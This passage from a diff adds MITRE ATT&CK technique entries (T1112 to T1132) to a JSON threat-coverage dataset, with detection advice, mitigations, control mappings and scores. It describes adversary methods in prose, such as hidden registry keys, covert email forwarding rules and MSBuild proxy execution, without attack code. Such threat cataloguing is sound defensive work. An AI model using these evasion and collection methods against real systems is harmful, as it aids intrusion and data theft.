+ "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.5427190476190477, + "adjusted_score": 0.5427190476190477, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "14.1,14.3" + ], + "nist_controls": [ + "CA-7", + "CM-2", + "CM-6", + "IA-2", + "IA-5", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1112", + "name": "Modify Registry", + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.", + "url": "https://attack.mitre.org/techniques/T1112", + "tactics": [ + "Defense Evasion" + ], + "detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation", + "Windows Registry: Windows Registry Key Deletion", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ], + "cumulative_score": 2.240247619047619, + "adjusted_score": 2.240247619047619, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1" + ], + "nist_controls": [ + "AC-6", + "CM-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1113", + "name": "Screen Capture", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", + "url": "https://attack.mitre.org/techniques/T1113", + "tactics": [ + "Collection" + ], + "detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.43006945408761904, + "adjusted_score": 0.43006945408761904, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1114", + "name": "Email Collection", + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "url": "https://attack.mitre.org/techniques/T1114", + "tactics": [ + "Collection" + ], + "detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "platforms": [ + "Google Workspace", + "Linux", + "Office 365", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "File: File Access", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1114.001", + "name": "Email Collection: Local Email Collection", + "url": "https://attack.mitre.org/techniques/T1114/001", + "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", + "detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1114.002", + "name": "Email Collection: Remote Email Collection", + "url": "https://attack.mitre.org/techniques/T1114/002", + "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.", + "detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1114.003", + "name": "Email Collection: Email Forwarding Rule", + "url": "https://attack.mitre.org/techniques/T1114/003", + "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)", + "detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "cumulative_score": 0.7210952380952381, + "adjusted_score": 0.7210952380952381, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "6.3,6.5,18.3,18.5,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-19", + "AC-20", + "AC-3", + "AC-4", + "CM-2", + "CM-6", + "IA-2", + "IA-5", + "SC-7", + "SI-12", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1115", + "name": "Clipboard Data", + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)", + "url": "https://attack.mitre.org/techniques/T1115", + "tactics": [ + "Collection" + ], + "detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.16543809523809525, + "adjusted_score": 0.16543809523809525, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1119", + "name": "Automated Collection", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.", + "url": "https://attack.mitre.org/techniques/T1119", + "tactics": [ + "Collection" + ], + "detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + } + ], + "cumulative_score": 0.44714765662285716, + "adjusted_score": 0.44714765662285716, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.11,11.4,12.8" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-20", + "CM-2", + "CM-6", + "CM-8", + "CP-6", + "CP-7", + "CP-9", + "SC-36", + "SC-4", + "SI-12", + "SI-23", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1120", + "name": "Peripheral Device Discovery", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "url": "https://attack.mitre.org/techniques/T1120", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.1416807922742857, + "adjusted_score": 0.1416807922742857, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1123", + "name": "Audio Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "url": "https://attack.mitre.org/techniques/T1123", + "tactics": [ + "Collection" + ], + "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.15973333333333334, + "adjusted_score": 0.15973333333333334, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1124", + "name": "System Time Discovery", + "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)", + "url": "https://attack.mitre.org/techniques/T1124", + "tactics": [ + "Discovery" + ], + "detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.14261904761904762, + "adjusted_score": 0.14261904761904762, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1125", + "name": "Video Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", + "url": "https://attack.mitre.org/techniques/T1125", + "tactics": [ + "Collection" + ], + "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.1255047619047619, + "adjusted_score": 0.1255047619047619, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "url": "https://attack.mitre.org/techniques/T1127", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1127.001", + "name": "Trusted Developer Utilities Proxy Execution: MSBuild", + "url": "https://attack.mitre.org/techniques/T1127/001", + "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)", + "detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "cumulative_score": 0.5396784474542857, + "adjusted_score": 0.5396784474542857, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,2.7,4.1,4.8,18.3,18.5,16.10" + ], + "nist_controls": [ + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "RA-5", + "SI-10", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1129", + "name": "Shared Modules", + "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.", + "url": "https://attack.mitre.org/techniques/T1129", + "tactics": [ + "Execution" + ], + "detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Module: Module Load", + "Process: OS API Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "cumulative_score": 0.20572621627142856, + "adjusted_score": 0.20572621627142856, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "2.5,2.6" + ], + "nist_controls": [ + "CM-2", + "CM-7", + "SI-10", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1132", + "name": "Data Encoding", + "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "url": "https://attack.mitre.org/techniques/T1132", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1132.001", + "name": "Data Encoding: Standard Encoding", + "url": "https://attack.mitre.org/techniques/T1132/001", + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "detection": "Analyze network data for uncommon data flows 